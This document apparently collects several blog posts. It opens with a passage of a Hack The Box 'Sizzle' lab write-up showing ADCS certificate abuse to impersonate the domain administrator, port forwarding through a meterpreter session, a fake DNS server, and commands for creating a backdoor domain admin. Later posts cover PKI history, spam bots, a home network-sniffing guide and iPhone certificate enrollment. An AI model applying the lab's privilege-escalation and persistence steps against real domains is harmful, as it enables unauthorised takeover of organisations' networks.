Then I re-submit the CSR for administrator@HTB.LOCAL (you don’t have to create a new CSR) and receive a new certificate with these EKUs. The certificate is imported to the local user’s store where I had created the CSR – double-click and confirm the import to Personal.

This is literally the key to the kingdom:

Fortunately, I have some SafeNet eTokens for tests!

To transfer the certificate and key, they have to be exported to a pfx file first. Again, I use certmgr.msc – Copy to File, selecting to also export the key:

I installed the SafeNet Authentication Client – middleware / crypto provider plus management tools, set a PIN, and use the function to import a certificate from a (pfx) file:

Proxies, fake DNS, and forwarding ports once more with proxychains socat [>> Contents]

The following turned out to be more difficult than expected – I am summarizing hours of testing as: It seems you cannot force Kerberos over a proxy on Windows, ‘proxychains-style’.

I tested several different proxy tools for Windows; the most promising was Proxifier. The simpler ones can’t handle the more low-level applications anyway, but Proxifier has an option to deal with Windows services – it seems it can work as a Winsock proxy. If I recall correctly, there are different sorts of proxies in Windows, and SMB uses Winsock. So at least I could finally forward SMB that way, and accessing shares anonymously works. But as soon as I want to use net use /smartcard, I see packets sent to TCP port 88, getting nowhere.

Proxifier even warned me that a certain ruby application (msf) would run into an infinite loop if I tried to proxy it :-) But I could not for the life of me get TCP 88 proxied on Windows, so I had to re-design the whole setup!

Back to Kali, and using proxychains socat to forward all the ports routed over the meterpreter session! Kali does not care about Windows-protocol specifics – I’d call that ‘port laundering’!

I proxychain socat-ed nearly everything I saw in netstat on Sizzle, TCP and UDP, plus an RPC high port I saw later in wireshark.

Example command for TCP and UDP 88:

proxychains socat TCP-LISTEN:88,fork TCP:10.10.10.103:88 &
proxychains socat UDP-LISTEN:88,fork,reuseaddr UDP:10.10.10.103:88 &

UDP Ports forwarded:

88, 389, 464

TCP ports forwarded – the RPC high ports seem to change, so this list looked a bit different for every join. This is the ‘union’ of all ports I ever used.

21,80,88,135,139,389,443,445,464,593,636,3268,3269,9389,47001,49664,49665,49666,49667,49669,49679,49681,49683,49686,49692,49702,52562,52582,49701

Note that the WinRM ports 5985 and 5986 remained forwarded ‘normally’ without proxychains socat all the time! So I am using one Windows box for WinRM, and I add another Windows box to the setup as the future ‘victim’ domain member.

I did not forward DNS, as that would screw up the discovery of Kerberos and LDAP services: The Windows victim client will believe that my Kali box is the domain controller sizzle.htb.local, and it accesses it under my local 192.168.x.y address. If I forwarded DNS queries to the true sizzle DC, it would respond with service records pointing to 10.10.10.103 … which the victim Windows box would not be able to reach. I tried some crazy things with ARP poisoning, but the solution is simpler: I set up dnsmasq as a fake DNS server on my Kali box and added all the required SRV records:

dnsmasq uses the dnsmasqhosts file instead of /etc/hosts, plus settings in the dnsmasq.conf file that make the box the authoritative DNS server for htb.local:

/etc/dnsmasqhosts

192.168.x.y sizzle.htb.local

/etc/dnsmasq.conf

addn-hosts=/etc/dnsmasqhosts
no-hosts

auth-zone=/htb.local
auth-server=/htb.local/192.168.x.y

srv-host=_ldap._tcp.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.Default-First-Site-Name._sites.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.dc._msdcs.htb.local,sizzle.htb.local,389
srv-host=_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.pdc._msdcs.HTB.LOCAL,sizzle.htb.local,389
srv-host=_ldap._tcp.gc._msdcs.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_gc._tcp.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_gc._tcp.Default-First-Site-Name._sites.HTB.LOCAL,sizzle.htb.local,3268
srv-host=_kerberos._tcp.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kerberos._udp.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kerberos._tcp.Default-First-Site-Name._sites.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kerberos._tcp.dc._msdcs.HTB.LOCAL,sizzle.htb.local,88
srv-host=_kpasswd._tcp.HTB.LOCAL,sizzle.htb.local,464
srv-host=_kpasswd._udp.HTB.LOCAL,sizzle.htb.local,464

Resources: List of the SRV records, how the locator process works. I am assuming that the standard name for the site was used – Default-First-Site-Name – which is confirmed by testing the record with nslookup as amanda, directly on sizzle. I omit the record containing the domain GUID, though that could be found in AD (AD Sites and Services or adsiedit.msc).
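
For completeness, the domain GUID could be read in amanda’s PSSession and turned into the missing record – a sketch with a placeholder for the GUID:

[sizzle.htb.local]: PS C:\> (Get-ADDomain).ObjectGUID

srv-host=_ldap._tcp.<DomainGuid>.domains._msdcs.htb.local,sizzle.htb.local,389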

I discovered some of the ports and records I had missed step by step, by sniffing the traffic during unsuccessful domain joins and net use attempts. For example, having received the info about the proper logon server, the client sends an LDAP query over UDP 389 – easy to miss as an important port to be forwarded.

Joining a Windows client to the htb.local domain [>> Contents]

The victim client is a physical Windows 7 box. Redirecting the crypto token over RDP worked, as did connecting it via USB to a Windows VM – but I did not want to risk anything and rather used a physical USB connection.

On this Windows box I configure the internal IP address of the Kali box as the only DNS server. dnsmasq answers all queries for the htb.local domain, and forwards all other DNS queries to the internet.

I test with some of the SRV records (IP obfuscated):

nslookup
Default Server:  sizzle.htb.local
Address:  192.168.x.y

> sizzle.htb.local
Server:  sizzle.htb.local
Address:  192.168.x.y

Name:    sizzle.htb.local
Address:  192.168.x.y

> set query=SRV
> _kerberos._tcp.dc._msdcs.HTB.LOCAL
Server:  sizzle.htb.local
Address:  192.168.x.y

_kerberos._tcp.dc._msdcs.HTB.LOCAL      SRV service location:
          priority       = 0
          weight         = 0
          port           = 88
          svr hostname   = sizzle.htb.local
sizzle.htb.local        internet address = 192.168.x.y
> 

For completeness: I also add an LMHOSTS file for the domain HTB, and could thus see WINS-like names with nbtstat – but this alone is definitely not sufficient to locate the domain.

I join the machine to the domain using the GUI / Properties of My Computer, change computer name or domain. Enter the new domain:

Enter amanda’s credentials – she can add her box to the domain:

Welcome!
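
The same join could also be done from an elevated PowerShell prompt on the client – a sketch:

# Prompts for amanda's password; reboot afterwards to complete the join
Add-Computer -DomainName htb.local -Credential HTB\amanda
Restart-Computer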

In parallel, I can check in the other Windows PC – in the PSSession – that my test machine has indeed been added to the domain!

[sizzle.htb.local]: PS C:\Users\amanda\Documents> get-adcomputer -filter *

DistinguishedName : CN=SIZZLE,OU=Domain Controllers,DC=HTB,DC=LOCAL
DNSHostName       : sizzle.HTB.LOCAL
Enabled           : True
Name              : SIZZLE
ObjectClass       : computer
ObjectGUID        : a4f7617b-9228-40b2-9e14-5b3aedb489bd
SamAccountName    : SIZZLE$
SID               : S-1-5-21-2379389067-1826974543-3574127760-1001
UserPrincipalName :

DistinguishedName : CN=TESTPC,CN=Computers,DC=HTB,DC=LOCAL
DNSHostName       :
Enabled           : True
Name              : TESTPC
ObjectClass       : computer
ObjectGUID        : 277cd1c8-0fd1-4816-a63e-bb0653c0ee59
SamAccountName    : TESTPC$
SID               : S-1-5-21-2379389067-1826974543-3574127760-3102
UserPrincipalName :

[sizzle.htb.local]: PS C:\Users\amanda\Documents>

Having recovered from the shock that this actually worked, I reboot the Windows 7 box and logon as amanda to the domain (and the PC) with her user name and password!

On the Kali box proxychains shows extensive communication over ports 88, 139, 445, 389,…, like this:

...
|S-chain|-<>-127.0.0.1:8088-<><>-10.10.10.103:445-<><>-OK
|S-chain|-<>-127.0.0.1:8088-<><>-10.10.10.103:88-<><>-OK
...

Summary of the solution so far [>> Contents]

As amanda, I confirm that I can again run the MMCs that I already used on the Windows attack DC – yes, I can again edit certificate templates, and I can also see one more computer in AD Users and Computers :-)

  • Start hackthebox VPN on Kali.
  • Get a default User certificate for amanda once. It is persistent and will last until its or the CA’s expiry, not affected by box reset.
  • Forward WinRM ports to Windows box 1, start WinRM session.
  • Start a simple shell, and from there a meterpreter shell.
  • Start a socks proxy, and route traffic through the meterpreter session.
  • Forward all ports again from Kali to your test network using proxychains socat.
  • Set up dnsmasq on Kali as a fake htb.local DNS server, hosting all SRV records.
  • On Windows box 2, configure your Kali’s internal IP as the only DNS server.
  • Join Windows box 2 to the domain htb.local as HTB\amanda
  • Logon to Windows box 2 as amanda
  • Edit the certificate template SSL to include required EKUs.
  • Prepare a CSR with the admin’s names.
  • Submit the file at /certsrv as amanda.
  • Import the certificate, export key and cert to a PFX, import it to a smartcard.

Finally: Using the Administrator’s token! [>> Contents]

Plug in the token and try net use! The smart card prompts for the PIN, and finally connects to c$ successfully!

C:\hackthebox>net use \\sizzle.htb.local\c$ /smartcard
Reading smart cards........
The following errors occurred reading the smart cards on the system:
No card on reader 2
No card on reader 3
No card on reader 4
No card on reader 5
Using the card in reader 1.  Enter the PIN:
The command completed successfully.

C:\hackthebox>dir \\sizzle.htb.local\c$
 Volume in drive \\sizzle.htb.local\c$ has no label.
 Volume Serial Number is 9C78-BB37

 Directory of \\sizzle.htb.local\c$

03.07.2018  17:22    <DIR>          Department Shares
02.07.2018  22:29    <DIR>          inetpub
02.12.2018  04:56    <DIR>          PerfLogs
26.09.2018  06:49    <DIR>          Program Files
26.09.2018  06:49    <DIR>          Program Files (x86)
11.07.2018  23:59    <DIR>          Users
06.05.2019  15:20    <DIR>          Windows
               0 File(s)              0 bytes
               7 Dir(s)  10.516.963.328 bytes free

C:\hackthebox>type \\sizzle.htb.local\C$\users\administrator\desktop\root.txt
91c58***************************
C:\hackthebox>

As amanda, start a session as the Administrator:

runas /smartcard cmd

Again the token asks for the PIN, and I finally have a shell!

\o/

Creating a (not really stealthy) backdoor admin [>> Contents]

I can now create another domain admin – I don’t even have to bother with powershell or net use, as I can start any GUI tool directly from that shell, e.g.

C:\Windows\system32\dsa.msc

Create a Test OU container and a Test User within it:

Add the user to some interesting groups:
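
If you prefer scripting over clicking through dsa.msc, the same could be done with the ActiveDirectory PowerShell module – a sketch, assuming the module is available, with made-up names:

# Create a test OU, a user inside it, and add the user to Domain Admins
New-ADOrganizationalUnit -Name "Test" -Path "DC=HTB,DC=LOCAL"
New-ADUser -Name "testuser" -Path "OU=Test,DC=HTB,DC=LOCAL" -AccountPassword (Read-Host -AsSecureString "Password") -Enabled $true
Add-ADGroupMember -Identity "Domain Admins" -Members "testuser"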

Switch the user and logon as HTB\testuser. Now I have my own domain admin desktop!

 

Certificates and PKI. The Prequel.

Some public key infrastructures have been running quietly in the background for years. They are half forgotten until the life of a signed file comes to an end – but then everything is on fire. In contrast to other seemingly important deadlines (Management needs this by XY or the world will come to an end!) this deadline really can’t be extended. The time of death has been included in the signed data all along.

The entire security ‘ecosystem’ changes while these systems sleep in the background. Now we have Let’s Encrypt (I was late to that party), HTTPS is everywhere, and the green padlock as an indicator of a secure site is about to die.

Recently I stumbled upon a whirlwind tour of the history of PKI and SSL/TLS – covering important events in the evolution of standards and technologies, from shipping SSLv2 in Netscape Navigator 1.1 in 1995 to Chrome marking HTTP pages as ‘not secure’ in 2018. Scrolling down the list of years I could not avoid waxing nostalgic. I had written about PKI at length before, but this time I do what the Hollywood directors of blockbusters do – I write a prequel.

I remember the first times I created a Certificate Signing Request (CSR) and submitted it to a Certificate Authority (CA). It was well before 2000, and it was an adventure!

I was a scientist turned freelance IT consultant – I went from looking at Transmission Electron Microscope images to troubleshooting why Outlook did not start on small business owners’ computers. And I was daring enough to give trainings, based on the little I knew (with hindsight) about IT and networking. I also developed some classes from scratch – creating wiki-style training material, using Microsoft FrontPage 1998.

One class was called networking and security or the like, and it was part of a vocational retraining curriculum – to turn former factory workers and admin assistants into computer technicians. For reasons I cannot remember I included a brief explanation of the RSA algorithm in my clunky FrontPage site. It was maybe a pretext to justify an exciting lab exercise: As the PKI history timeline shows, SSL was still rather new. Press releases by Austrian IT companies highlighted the military-grade protection from eavesdropping. It felt like Star Trek. One of the early Austrian National CAs offered ‘light’ test certificates. The description of the enrollment process was targeted at business users, but it was pure geek speak: A mysterious multi-step procedure explained in hacker terms like Secure Vault.

I don’t remember if my students found it that exciting, or if the test of enrolling lots of certificates simultaneously worked all that well. But I was hooked.

As a freelancer I started working with my former colleagues again – supporting the scientists to subvert re-interpret the central IT department’s policies by setting up their own server, or by circumventing the firewall by dialing in to their own modem. These were the days of IT hype in the late 1990s before the dotcom bust. The research center had a new CEO with an IT background, and to get your projects approved you had to tack the label virtual onto anything. So I helped with creating a Virtual Materials Science Lab – which meant we used Microsoft Netmeeting.

Despite or because of such activities I also started working for the IT department. It was the time when The Cluetrain Manifesto told us that hyperlinks were subversive. As a ‘manager’ I should have disciplined shadow IT admins purchasing their own domains and running their shadow servers, but I could not stop tinkering with the web servers myself. It was also the time when I learned that to make things work in larger organizations – or a combination of several of those – you often need to social engineer someone.

We needed an SSL certificate – and I was the super qualified person for that task, based on my experience playing with the Secure Vault. But creating and submitting the CSR, and installing the certificate, was the easy part. There were unexpected challenges:

The research center had a long legal name – 65 characters including the final dot in the indication of the legal entity. Common Names in X.509 certificates are limited to 64 characters, so I could not enter the final dot in IIS’s (Internet Information Server’s) wizard for CSRs. The legal name was cross-checked against the Dun&Bradstreet database. One would think that the first 64 characters of a peculiar German name would have been sufficient, but no. It took several phone calls – and faxes! – to prove to the US-based CA company that we were who we claimed to be.

The fact I called a CA company in the US might highlight a mistake: If I recall correctly Big CA had partners in Europe already at that time, but I missed that, or I wanted to talk to the mothership for some reason.

To purchase the certificate from the US-based company you needed a credit card, to be entered exactly when you submit the CSR. This process was disrupting the usual purchasing procedures and I had to social engineer somebody from the procurement department to join me in my adventure, bringing the corporate credit card.

The research center was a company owned 51% by government – so you had SAP and insane management deadlines as well as conferences and academic publication records. The Internet in general was still dominated by its academic roots. Not long ago, there had been a single web page listing All WWW servers in Austria, and that page was run by the academic internet backbone. Domain registration data were tied to a person, to the wrong person, or to the wrong entity – which came back to bite you later.

Fortunately the domain assigned to the SSL certificate belonged to us – so I did not have to  social engineer a DNS admin this time. But it was assigned to a person and not to the organization. The person was an employee in charge of the network, but how should you prove that? More faxes and phone calls were required to sort out the fine legal points.

I did not keep records of that period, so I don’t know if this web server is still alive or if at least the domain still exists. Maybe unlikely, given the rapid decay of rotting links. But while researching history for this post – randomly googling for early versions of Microsoft’s web servers – I discovered interesting things. There is a small chance it may be alive!

The first version of the Windows Certificate Authority had been released as an add-on to Windows NT 4, as part of the so-called Windows NT 4 Option Pack – the same add-on that also contained the webserver (IIS) itself. It was the time when I learned ASP programming by going online via dial-up and browsing through MSDN as quickly as possible so as not to overspend my precious monthly online time.

I wanted to relive the setup of Internet Information Server 4.0 and the Option Pack – and found lots of support articles and how-to’s, like this one.

However, I also found live websites like this:

This is only the setup CD, so no danger yet, but you can as well find sites with the welcome page of the operating web server online – including sample ASP applications – which I don’t show deliberately. (Image credits: Microsoft.)

I wonder why I had been frantically re-developing my websites in ASP.NET from scratch – ‘just because’ ASP was outdated technology, even though there were no known vulnerabilities and the sites were running on a modern operating system.

Time to quote from Peter Gutmann’s book Engineering Security:

A great many of today’s security technologies are “secure” only because no-one has ever bothered attacking them.

… which is also true for yesterday’s technology still online!

Bots, Like This! I am an Ardent Fan of HTTPS and Certificates!

This is an experiment in Machine Learning, Big Data, Artificial Intelligence, whatever.

But I need proper digression first.

Last autumn, I turned my back on social media and went offline for a few days.

There, in that magical place, the real world was offline as well. A history of physics museum had to be opened, just for us.

The sign says: Please call XY and we open immediately.

Scientific instruments of the past have a strange appeal, steampunk-y, artisanal, timeless. But I could not have enjoyed it, hadn’t I locked down the gates of my social media fortresses before.

Last year, ‘improved’ bots and spammers seem to have invaded WordPress. Did their vigilant spam filters feel a disturbance of the force? My blog had been open for anonymous comments for more than 5 years, but I finally had to restrict access. Since last year every commentator needs to have one manually approved comment.

But how to get attention if I block the comments? Spam your links by Liking other blogs. Anticipate that clickers will be very dedicated: Clicking on your icon only takes the viewer to your gravatar profile. The gravatar shows a link to the actual spammy website.

And how to pick suitable – likeable – target blog posts? Use your sophisticated artificial intelligence: If you want to sell SSL certificates (!) pick articles that contain key words like SSL or domain – like this one. BTW, I take the ads for acne treatment personally. Please stick to marketing SSL certificates. Especially in the era of free certificates provided by Let’s Encrypt.

Please use a different image for your different gravatars. You have done rather well when spam-liking the post on my domains and HTTPS, but what was on your mind when you found my post on hijacking orphaned domains for malvertizing?

Did statements like this attract the army of bots?

… some of the pages contain links to other websites that advertize products in a spammy way.

So what do I need to do to make you all like this post? Should I tell you that I have a bunch of internet domains? That I migrated my non-blogs to HTTPS last year? That WordPress migrated blogs to HTTPS some time ago? That they use Let’s Encrypt certificates now, just as the hosting provider of my other websites does?

[Perhaps I should quote ‘SSL’ and ‘TLS’, too.]

Or should I tell you that I once made a fool of myself for publishing my conspiracy theories – about how Google ditched my blog from their index? While I actually had missed that you need to add the HTTPS version as a separate item in Google Webmaster Tools?

So I desperately need help with Search Engine Optimization and Online Marketing. Google shows me ads for their free online marketing courses on Facebook all the time now.

Or do I need help with HTTPS (TLS/SSL)? Embarrassing, as for many years I did nothing else than implement Public Key Infrastructures and troubleshoot certificates. I am still debugging all kinds of weird certificate chaining and browser issues. The internet is always a little bit broken, says Sir Tim Berners-Lee.

[Is X.509 certificate a good search term? No, too nerdy, I guess.]

Or maybe you are more interested in my pioneering Search Term Poetry and Spam Poetry.  I need new raw material.

Like this! Like this! Like this!

Maybe I am going to even approve a comment and talk to you. It would not be the first time I fail the Turing test on this blog.

Don’t let me down, bots! I count on you!

Update 2018-02-13: So far, this post was a success. The elkemental blog has not seen this many likes in years … and right now I noticed that the omnipresent suit bot has also started to market solar energy and to like my related posts!

Update 2018-02-18: They have not given up yet – we welcome another batch of bots!


Update 2018-04-01: They are becoming more subtle – now they spam-like comments, albeit (sadly) not the comments on this article. Too bad I don’t display the comment likes – only I see them in the admin console ;-)


Network Sniffing for Everyone – Getting to Know Your Things (As in Internet of Things)

Simple Sniffing without Hubs or Port Mirroring for the Curious Windows User
[Jump to instructions and skip intro]

Your science-fiction-style new refrigerator might go online to download the latest offers or order more pizza after checking your calendar and noticing that you have to finish a nerdy project soon.

It may depend on your geekiness or faith in things or their vendors, but I absolutely need to know more about the details of this traffic. How does the device authenticate to the external partner? Is the connection encrypted? Does the refrigerator company spy on me? Launch the secret camera and mic on the handle?

In contrast to what the typical hacker movie might imply, you cannot simply sniff all traffic on a network, even if you have physical access to all the wiring.

In the old days, that was easier. Computers were connected using coaxial cables:

10base2 t-piece

Communications protocols are designed to deal with devices talking to any other device on the network at any time – there are mechanisms to sort out collisions. When computers want to talk to each other they use (logical) IP addresses that need to get translated to physical device (MAC) addresses. Every node in the network can store the physical addresses of its peers in the local subnet. If it does not yet know the MAC address of the recipient of a message, it shouts out a broadcast message to everybody and learns MAC addresses that way. But packets intended for one recipient are still visible to any other party!

A hub does (did) basically the same thing as coaxial cables, only the wiring was different. My very first ‘office network’ more than 15 years ago was based on a small hub that I have unfortunately disposed of.

Nowadays even the cheapest internet router uses a switch – it looks similar but works differently:

A switch minimizes traffic and collisions by memorizing the MAC addresses associated with different ports (‘jacks’). If a notebook wants to talk to the local server, the packet is sent from the notebook to the switch, which forwards it to the port the server is connected to. Another curious employee’s laptop cannot see that traffic.

This is fine from the perspective of avoiding collisions and performance but a bad thing if you absolutely want to know what’s going on.

I could not resist using the clichéd example of the refrigerator but there are really more and more interesting devices that make outbound connections – or even effectively facilitate inbound ones – so that you can connect to your thing from the internet.

Using a typical internet connection and router, a device on the internet cannot make an unsolicited inbound connection unless you open up respective ports on your router. Your internet provider may prevent this: Either you don’t have access to your router at all, or your router’s external internet address is still not a public one.

In order to work around this nuisance, some devices may open a permanent outbound connection to a central ‘rendezvous server’. As soon as somebody wants to connect to the device behind your router, the server utilizes this existing connection – which is technically an outbound one, from the perspective of the device.

Remote support tools such as TeamViewer use technologies like that to allow helping users behind firewalls. Internet routers do that, too: D-Link calls their respective series Cloud Routers (and stylish those things have become, haven’t they?).

How to: Setup your Windows laptop as a sniffer-router

If you want to sniff traffic from a blackbox-like device trying to access a server on the internet you would need a hub – which is very hard to get these days; you may find some expensive used ones on ebay. Another option is to use a switch that supports Port Mirroring: All traffic on the network is replicated to a specific port, and connecting to that with your sniffer computer you could inspect all the packets.

But I was asking myself for the fun of it:

Is there a rather simple method a normal Windows user could use though – requiring only minimal investment and hacker skills?

My proposed solution is to force the interesting traffic to go through your computer – that is turning this machine into a router. A router connects two distinct subnets; so the computer needs two network interfaces. Nearly every laptop has an ethernet RJ45 jack and wireless LAN – so these are our two NICs!

I am assuming that the thing to be investigated has a wired connection rather than wireless LAN, so we want…

  • … the WLAN adapter to connect to your existing home WLAN and then the internet.
  • … the LAN jack to connect to a private network segment for your thing. The thing will access the internet through a cascade of two routers finally.

Routing is done via a rarely used Windows feature that experts will mock – but it does the job and is built in: so-called Internet Connection Sharing.

Additional hardware required: A crossover cable: The private network segment has just a single host – our thing. (Or you could use another switch for the private subnet – but I am going for the simplest solution here.)

Software required: Some sniffer such as the free software Wireshark.

That’s the intended network setup (using 192.168.0.x as a typical internal LAN subnet)

|    Thing    |       |      Laptop Router      |      |Internet Router
|     LAN     |-cross-|     LAN     |    WLAN   |-WLAN-|Internal LAN
|192.168.137.2|       |192.168.137.1|192.168.0.2|      |192.168.0.1
  • Locate the collection of network adapters, in Windows 7 this is under
    Control Panel
    –Network and Internet
    —-View Network Status and Tasks
    ——Change Adapter Settings
  • In the Properties of the WLAN adapter click the Sharing tab and check the option Allow other network users to connect through this computer’s Internet connection.
  • In the drop-down menu all other network adapters except the one being shared should be visible – select the one representing the RJ45 jack, usually called Local Area Connection.

Internet Connection Sharing

  • Connect the RJ45 jack of the chatty thing (usually tagged LAN) to the LAN jack of your laptop with the crossover cable.
  • If it uses DHCP (most devices do), it will be assigned an IP address in the 192.168.137.x network. If it doesn’t and it needs a fixed IP address, you should configure it for an address in this network with x other than 1. The router-computer will be assigned 192.168.137.1 and acts as the DHCP server, DNS server, and the default gateway.
  • Start Wireshark, click Capture…, Interfaces, locate the LAN adapter with IP address 192.168.137.1 and click Start

Now you see all the packets this device may send to the internet.
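If you prefer the command line over the Wireshark GUI, the same capture can be scripted with tshark, the console tool that ships with Wireshark. A minimal sketch – the interface name, the output file name, and the 192.168.137.2 address of the thing are placeholders for whatever your setup uses:

# List the available interfaces first to find the one bound to 192.168.137.1
tshark -D

# Capture everything on the shared LAN adapter into a file for later analysis
tshark -i "Ethernet" -w thing-traffic.pcapng

# Or watch only the thing's packets live (192.168.137.2 is the address DHCP handed out)
tshark -i "Ethernet" -f "host 192.168.137.2"

Inside the Wireshark GUI the display filter ip.addr == 192.168.137.2 narrows the view down to the same traffic.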

I use an innocuous example now:

On connecting a Samsung Blu-ray player, I see some interesting traffic:

Samsung bluray, packets

The box gets an IP address via DHCP (only last packet shown – acknowledgement of the address), then tries to find the MAC address for the router-computer 192.168.137.1 – a Dell laptop – as it needs to consult the DNS service there and ask for the IP address corresponding to an update server whose name is obviously hard-coded. It receives a reply, and the – ‘fortunately’ non-encrypted – communication with the first internet-based address is initiated.

Follow TCP stream shows more nicely what is going on:

Samsung bluray player wants to update

The player sends an HTTP GET to the script liveupdate.jsp, appending the model, version number and its location in the European Union. Since the player is behind two routers – that is, NAT devices – Samsung sees this coming from my Austrian IP address.

The final reply is a page reading [NO UPDATE], and they sent me a cookie that is going to expire 3,5 years in the past ;-) So probably this does not work anymore.

As I said – this was an innocuous example. I just wanted to demonstrate that you never know what will happen if you can’t resist connecting your things to your local computer network. You might argue that normal computers generate even more traffic trying to contact all kinds of update servers – but in contrast to reverse engineering a blackbox of a thing you 1) can just switch on the sniffer and see that traffic without any changes to be made to the network and 2) as the owner of your computers you could in principle control it.

________________________________

Further reading:

Peer-to-Peer Communication Across Network Address Translators – an overview of different techniques to allow for communication of devices behind NAT devices such as firewalls or internet routers.

Ethernet and Address Resolution Protocol (ARP) on Wikipedia

Sniffing Tutorial part 1 – Intercepting Network Traffic: Overview on sniffing options: dumb hubs, port mirroring, network tap.

Diffusion of iTechnology in Corporations (or: Certificates for iPhones)

[Jump to technical stuff]

Some clichés are true. One I found confirmed often is about how technologies are adopted within organizations: One manager meets another manager at a conference / business meeting / CIO event. Manager X shows off the latest gadget and/or brags about / presents a case study of a successful implementation of Y.

Another manager becomes jealous / inspired, and after returning home he immediately calls upon his poor subordinates and has them implement Y – absolutely, positively, ASAP.

I suspect that this is the preferred diffusion mechanism for implementing SAP at any kind of organization or for the outsourcing hype (probably also the insourcing-again movement that followed it).

And I definitely know it works that way for iSomething such as iPhones and iPads. Even if iSomething might not be the officially supported standard. But no matter how standardized IT and processes are – there is always something like VIP support. I do remember vividly how I was once told that we (the IT guys) should not be so overly obliging when helping users – unless I (the top manager) need something.

So trying to help those managers is the root cause for having to solve a nice puzzle: iThings need to have access to the network and thus often need digital certificates. Don’t tell me that certificates might not be the perfect solution – I know that. But working in some sort of corporate setting you are often not in the position to bring up these deep philosophical questions again and again, so let’s focus on solving the puzzle:

[Technical stuff – I am trying a new format to serve different audiences here]

Certificates for Apple iPhone 802.1x / EAP-TLS WLAN Logon

The following is an environment you would encounter rather frequently: Computer and user accounts are managed in Microsoft Active Directory – providing both Kerberos authentication infrastructure and LDAP directory. Access to Wireless LAN is handled by RADIUS authentication using Windows Network Policy Server (NPS), and client certificates are mandatory as per RADIUS policies.

You could require 802.1x authentication to be done by user accounts and/or machine accounts (though it is a common misunderstanding that in this way you can enforce a logon by 1) the computer account and then 2) the user account at the same machine). I am now assuming that computers (only) are authenticated. Thus the iDevice needs to present itself as a computer to the logon servers.

Certificates contain lots of fields, and standards either don’t enforce clearly what should go into those fields and/or applications interpret standards in weird ways. Thus the pragmatic approach is to tinker and test!

This is the certificate design that works for iPhones according to my experience:

  • We need a ‘shadow account’ in Active Directory whose properties will match fields in the certificates. Two LDAP attributes need to be set:
    1. dnsHostName: machine.domain.com
      This is going to be mapped onto the DNS name in the Subject Alternative Name of the certificate.
    2. servicePrincipalNames: HOST/machine.domain.com
      This makes the shadow account a happy member of the Kerberos realm.

    According to my tests, the creation of an additional name mapping – as recommended here – is not required. We are using Active Directory default mapping here – DNS machine names work just like users’ UPNs (User Principal Name – the logon name in user@domain syntax. See e.g. Figure 21 – Certificate Processing Logic – in this white paper for details.)

  • Extensions and fields in the certificate
    1. Subject Alternative Name: machine.domain.com (mapped to the DNS name dnsHostName in AD)
    2. Subject CN: host/machine.domain.com. This is different from Windows computers – as far as I understood what’s going on from the RADIUS logging, the Apple 802.1x client sends the string just as it appears in the CN. Windows clients would add the prefix host/ automatically.
    3. If this is a Windows Enterprise PKI: Copy the default template Workstation Authentication, and configure the Subject Name to be supplied with the request. The CA needs to accept custom SANs via enabling the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (see the sketch after this list). Keys need to be configured as exportable to carry them over to the iDevice.
  • Create the key, request and certificate on a dedicated enrollment machine. Note that this should be done in the context of the user rather than the local machine. Certificates/keys can be transported to other machines as PKCS#12 (PFX files).
  • Import the key and certificate to the iPhone using the iPhone Configuration Manager – this tool allows for exporting directly from the current user’s store. So if the user does not enroll for those certificates himself (which makes sense, as the enrollment procedure is somewhat special, given the custom names), the PFX files would first be imported to the user’s store and then exported from there to the iPhone.
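For the Windows-minded, here is a minimal sketch of that enrollment procedure. All names – the shadow account iphone01, the template iPhoneWorkstationAuth, the file names – are hypothetical placeholders; the commands assume a domain-joined enrollment machine with the ActiveDirectory PowerShell module plus a Windows Enterprise CA:

# 1. Shadow account with the two LDAP attributes mentioned above
New-ADComputer -Name "iphone01" -DNSHostName "iphone01.domain.com"
Set-ADComputer -Identity "iphone01" -ServicePrincipalNames @{Add="HOST/iphone01.domain.com"}

# 2. Custom request: the CN carries the host/ prefix, the key is exportable for the later PFX export
@"
[NewRequest]
Subject = "CN=host/iphone01.domain.com"
Exportable = TRUE
KeyLength = 2048
[RequestAttributes]
CertificateTemplate = iPhoneWorkstationAuth
"@ | Set-Content request.inf

certreq -new request.inf request.req

# 3. Submit with the DNS name as a SAN attribute - the CA only honors this if the EDITF flag is set
certreq -submit -attrib "SAN:dns=iphone01.domain.com" request.req iphone01.cer
certreq -accept iphone01.cer

# 4. On the CA: accept SANs supplied with the request, then restart the service
certutil -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
net stop certsvc
net start certsvc

Certificate and key then sit in the enrolling user’s store and can be exported as a PFX for the import described above.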

The point I’d like to stress in relation to certificates is that logon against AD is based on matching strings – containing the DNS names – not on a binary comparison of the file presented by the client versus a certificate file stored in the directory.

I have encountered that misconception often as there is an attribute in AD – userCertificate – that is actually designed for holding users’ (or machines’) certificates. But this is more of an Alice-tries-to-get-Bob’s-public-key phonebook-style attribute, and it is not intended to be used for authentication but rather for encryption – Outlook is searching for S/MIME e-mail recipients’ public keys there. Disclaimer: I cannot vouch for any custom application that may exist.

Authentication is secure nonetheless, as the issuing CA’s certificate needs to be present in a special LDAP object, the so-called NTAuth object in Active Directory’s Configuration Container, and by default it can only be edited by Enterprise Admins – the ‘root admins’ of AD. In addition you have to explicitly configure the CA to accept arbitrary SANs in requests.

IPhone Fashion Valley

Happy iPhone users with their iPhones, when the product was released in 2007. I have never owned any iThing so I need to borrow an image from Wikimedia (user 1DmkIIN).

The Strange World of Public Key Infrastructure and Certificates

An e-mail discussion related to my recent post on IT security has motivated me to ponder about issues with Public Key Infrastructure once more. So I attempt – most likely in vain – to merge a pop-sci introduction to certificates with sort of an attachment to said e-mail discussion.

So this post might be opaque to normal users and too epic and introductory for security geeks.

I mentioned the failed governmental PKI pilot project in that post – a hardware security device destroyed the key and there was no backup. I would have made fun of this – had I not experienced so often that it is the so-called simple processes and logistics that go wrong.

I didn’t expect to find such a poetic metaphor for “security systems” rendered inaccessible. Padlocks in Graz, Austria. Legend has it that lovers attaching a padlock to the bridge and throwing the key into the water will be together forever.

